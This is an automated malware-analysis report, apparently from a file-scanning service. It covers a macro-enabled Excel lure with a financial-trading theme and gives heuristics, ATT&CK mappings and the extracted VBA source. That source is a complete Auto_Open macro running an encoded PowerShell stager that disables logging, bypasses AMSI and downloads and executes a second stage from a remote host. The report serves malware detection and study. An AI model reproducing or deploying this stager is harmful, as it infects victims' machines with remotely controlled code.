MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that execute automatically upon opening, leveraging WScript.Shell and CreateObject to run a PowerShell command. This PowerShell command is heavily obfuscated but appears to be designed to download and execute a second-stage payload. The document body suggests a financial trading lure to trick users into enabling macros.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA" Set asd = CreateObject("WScript.Shell") asd.Run (x) -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Dim x As String x = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVg" x = x + "BlAHIAcwBpAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBp" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA" Set asd = CreateObject("WScript.Shell") asd.Run (x) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Name = "Module1" Sub Auto_Open() pCb
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8014 bytes |
SHA-256: 7231959c4d4e6787e1120713e912987a1e8911002aa96e5cda0e9b80ae3ffba5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
pCb
End Sub
Public Function pCb() As Variant
Dim x As String
x = "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVg"
x = x + "BlAHIAcwBpAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBp"
x = x + "AG8ATgAuAE0AQQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJAA1AD"
x = x + "MARgAxAD0AWwByAGUAZgBdAC4AQQBzAHMAZQBtAEIATAB5AC4A"
x = x + "RwBFAHQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbg"
x = x + "BhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAu"
x = x + "AFUAdABpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAATABEAC"
x = x + "IAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMA"
x = x + "eQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUA"
x = x + "B1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAk"
x = x + "ADUAMwBGADEAKQB7ACQAQQA2ADUAMwA9ACQANQAzAEYAMQAuAE"
x = x + "cARQB0AFYAYQBsAHUARQAoACQATgB1AGwAbAApADsASQBGACgA"
x = x + "JABBADYANQAzAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbw"
x = x + "BjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYQA2ADUAMwBb"
x = x + "ACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAG"
x = x + "cAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAA"
x = x + "dABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQ"
x = x + "AwADsAJABhADYANQAzAFsAJwBTAGMAcgBpAHAAdABCACcAKwAn"
x = x + "AGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAG"
x = x + "IAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMA"
x = x + "YQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdg"
x = x + "BBAGwAPQBbAEMAbwBsAEwAZQBjAFQAaQBPAE4AUwAuAEcAZQBu"
x = x + "AEUAUgBJAGMALgBEAGkAQwBUAEkATwBOAEEAUgBZAFsAcwB0AF"
x = x + "IAaQBOAGcALABTAFkAUwB0AGUAbQAuAE8AYgBKAGUAYwBUAF0A"
x = x + "XQA6ADoATgBlAFcAKAApADsAJABWAGEAbAAuAEEAZABkACgAJw"
x = x + "BFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBj"
x = x + "AGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEAbAAuAE"
x = x + "EAZABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwA"
x = x + "bwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbg"
x = x + "BnACcALAAwACkAOwAkAEEANgA1ADMAWwAnAEgASwBFAFkAXwBM"
x = x + "AE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AG"
x = x + "EAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMA"
x = x + "bwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaA"
x = x + "BlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBM"
x = x + "AG8AZwBnAGkAbgBnACcAXQA9ACQAVgBhAGwAfQBFAGwAcwBFAH"
x = x + "sAWwBTAGMAcgBJAHAAVABCAGwATwBDAGsAXQAuACIARwBFAFQA"
x = x + "RgBpAEUAYABsAEQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcw"
x = x + "AnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABh"
x = x + "AHQAaQBjACcAKQAuAFMARQBUAFYAQQBMAFUAZQAoACQAbgB1AE"
x = x + "wAbAAsACgATgBFAHcALQBPAEIASgBFAEMAdAAgAEMATwBMAEwA"
x = x + "RQBjAFQAaQBvAE4AUwAuAEcAZQBOAEUAcgBJAEMALgBIAGEAUw"
x = x + "BoAFMAZQBUAFsAUwBUAFIAaQBOAGcAXQApACkAfQAkAFIAZQBG"
x = x + "AD0AWwBSAGUARgBdAC4AQQBTAHMARQBtAGIAbAB5AC4ARwBlAH"
x = x + "QAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcA"
x = x + "ZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQ"
x = x + "BzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAEYALgBH"
x = x + "AGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAC"
x = x + "cAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkA"
x = x + "YwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAQQBsAFUAZQ"
x = x + "AoACQATgBVAGwAbAAsACQAdAByAFUAZQApADsAfQA7AFsAUwB5"
x = x + "AHMAVABFAG0ALgBOAEUAVAAuAFMAZQBSAFYAaQBjAEUAUABvAE"
x = x + "kAbgBUAE0AYQBuAEEAZwBFAFIAXQA6ADoARQB4AFAARQBDAFQA"
x = x + "MQAwADAAQwBvAG4AVABJAE4AVQBFAD0AMAA7ACQAMQBmAGYANA"
x = x + "A9AE4AZQB3AC0ATwBCAEoARQBDAHQAIABTAFkAcwB0AGUATQAu"
x = x + "AE4ARQBUAC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQAnAE"
x = x + "0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcA"
x = x + "cwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcg"
x = x + "BpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAAp"
x = x + "ACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9AC"
x = x + "QAKABbAFQAZQBYAFQALgBFAE4AYwBvAGQASQBOAEcAXQA6ADoA"
x = x + "VQBOAGkAQwBPAGQARQAuAEcAZQBUAFMAdABSAEkATgBHACgAWw"
x = x + "BDAG8ATgB2AEUAcgBUAF0AOgA6AEYAcgBPAG0AQgBBAHMARQA2"
x = x + "ADQAUwB0AFIASQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAE"
x = x + "EAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUA"
x = x + "QQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdQBBAEQAaw"
x = x + "BBAE8AUQBBADYAQQBEAGcAQQBPAEEAQQA0AEEARABnAEEAJwAp"
x = x + "ACkAKQA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAH"
x = x + "AAaABwACcAOwAkADEARgBGADQALgBIAEUAQQBEAEUAcgBzAC4A"
x = x + "QQBEAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQ"
x = x + "ApADsAJAAxAGYAZgA0AC4AUABSAG8AeABZAD0AWwBTAFkAcwB0"
x = x + "AGUAbQAuAE4AZQBUAC4AVwBlAEIAUgBlAHEAVQBlAHMAVABdAD"
x = x + "oAOgBEAGUAZgBBAFUATABUAFcAZQBCAFAAcgBPAHgAeQA7ACQA"
x = x + "MQBGAEYANAAuAFAAUgBvAHgAeQAuAEMAUgBFAGQARQBuAFQAaQ"
x = x + "BBAGwAcwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBlAFQALgBD"
x = x + "AHIAZQBEAGUAbgBUAGkAQQBMAEMAYQBDAEgARQBdADoAOgBEAE"
x = x + "UARgBhAHUATAB0AE4ARQB0AFcATwByAGsAQwByAEUAZABlAG4A"
x = x + "VABJAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQ"
x = x + "AgAD0AIAAkADEAZgBmADQALgBQAHIAbwB4AHkAOwAkAEsAPQBb"
x = x + "AFMAWQBzAHQAZQBtAC4AVABFAFgAdAAuAEUAbgBDAG8AZABJAE"
x = x + "4ARwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAVABlAHMA"
x = x + "KAAnADcAbABrACsALgA5AD4AYgAwAHwAMQBtAG4AQAA/ACkAZA"
x = x + "BbACEAcQB7AFYAMgAzACwAcgB6AF0AVABDACUAZgAnACkAOwAk"
x = x + "AFIAPQB7ACQARAAsACQASwA9ACQAQQByAEcAUwA7ACQAUwA9AD"
x = x + "AALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0A"
x = x + "KAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASw"
x = x + "AuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBd"
x = x + "ACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbAC"
x = x + "QAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkA"
x = x + "JQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQ"
x = x + "AlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9"
x = x + "ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAH"
x = x + "gATwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgA"
x = x + "XQApACUAMgA1ADYAXQB9AH0AOwAkADEARgBmADQALgBIAGUAYQ"
x = x + "BEAEUAcgBTAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAi"
x = x + "AHYAcABmAEEAYgBaAEMAYQB1AGsAdABHAEoAWQA9AHcAMABDAH"
x = x + "UASgBEAHoAVwBRAGUAUQAyAFQARABXAGwANABvAHkAUABTAE4A"
x = x + "cAB6AGsAdgBzAD0AIgApADsAJABkAGEAdABBAD0AJAAxAEYAZg"
x = x + "A0AC4ARABPAFcATgBMAG8AYQBEAEQAQQB0AGEAKAAkAHMARQBS"
x = x + "ACsAJABUACkAOwAkAGkAVgA9ACQAZABBAFQAYQBbADAALgAuAD"
x = x + "MAXQA7ACQAZABhAHQAQQA9ACQAZABhAFQAQQBbADQALgAuACQA"
x = x + "RABhAHQAYQAuAEwARQBuAGcAVABIAF0AOwAtAGoATwBpAG4AWw"
x = x + "BDAGgAYQBSAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAg"
x = x + "ACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
Set asd = CreateObject("WScript.Shell")
asd.Run (x)
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes |
SHA-256: 5f5d78c0e64c9d7da8e7758f822dd2e6b31e7cd605d0550a034cc0604a6f4c12 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.